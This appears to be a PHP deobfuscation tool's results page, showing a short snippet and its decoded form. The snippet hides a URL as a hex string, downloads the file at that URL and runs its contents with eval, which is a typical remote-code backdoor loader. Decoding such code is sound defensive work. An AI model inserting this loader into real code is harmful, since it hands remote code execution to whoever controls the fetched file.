Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $s9 = "687474703a2f2f6c6f63616c686f73742f746573742f6f6b6f6b2e747874"; $m="..
Decoded Output download
<?php
$s9 = "687474703a2f2f6c6f63616c686f73742f746573742f6f6b6f6b2e747874";
$m="s9"; //URLhex
eval(file_get_contents(PACK('H*',$$m))); ?>
Did this file decode correctly?
Original Code
<?php
$s9 = "687474703a2f2f6c6f63616c686f73742f746573742f6f6b6f6b2e747874";
$m="s9"; //URLhex
eval(file_get_contents(PACK('H*',$$m)));
Function Calls
PACK | 1 |
Stats
MD5 | c1b3129114168207fa654187705a70da |
Eval Count | 0 |
Decode Time | 123 ms |